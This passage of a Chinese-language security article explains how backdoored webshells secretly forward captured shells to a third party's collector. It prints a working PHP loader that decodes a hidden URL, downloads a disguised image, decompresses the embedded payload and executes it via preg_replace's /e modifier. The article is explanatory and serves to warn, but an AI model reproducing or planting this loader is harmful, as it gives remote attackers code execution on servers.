揭秘网络黑吃黑产业之"后门箱子"

2020-6-19 15:22 |来自: 互联网 4339 0

摘要: 在一些渗透测试中，往往会用到各种大马，小马，一句话，菜刀等等……但是你们有想过这些工具会存在后门吗？何为webshellwebshell的获取一般要跟大马小马这些挂上一个√(就算是命令执行也需要shell)。webshell简单理解就是网站的一个管理程序，可以上传下载等等一系列操作，而大小马则是这个管理程序的 ...

关键词： 后门箱子代码 39 小马 shell 违法 session 小白进账

在一些渗透测试中，往往会用到各种大马，小马，一句话，菜刀等等……但是你们有想过这些工具会存在后门吗？

何为webshell

webshell的获取一般要跟大马小马这些挂上一个√(就算是命令执行也需要shell)。webshell简单理解就是网站的一个管理程序，可以上传下载等等一系列操作，而大小马则是这个管理程序的代码。

关于后门

一般存在后门的话，所获得的shell会通过后门发送给箱子，那个箱子就是用来装shell的地方！

举个例子

error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>

这里我们主要看

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这串代码看起来可能平平无奇，但是执行过后其实是一张箱子的图片地址，这个地址我就不放出来了，有兴趣的可以自己搭建解密！这个图片还需要调用file_get_contents函数读取图片为字符串，然后substr取3649字节之后的内容，再调用gzuncompress解压，得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码。然后，shell就被装进箱子里了。

黑吃黑是怎么形成的

其实网络安全圈子里定义一直模糊，有人兢兢业业挖洞，做src；有人背地里干违法勾当，赚黑心钱。天天在群里秀，挖洞的一部分人就会想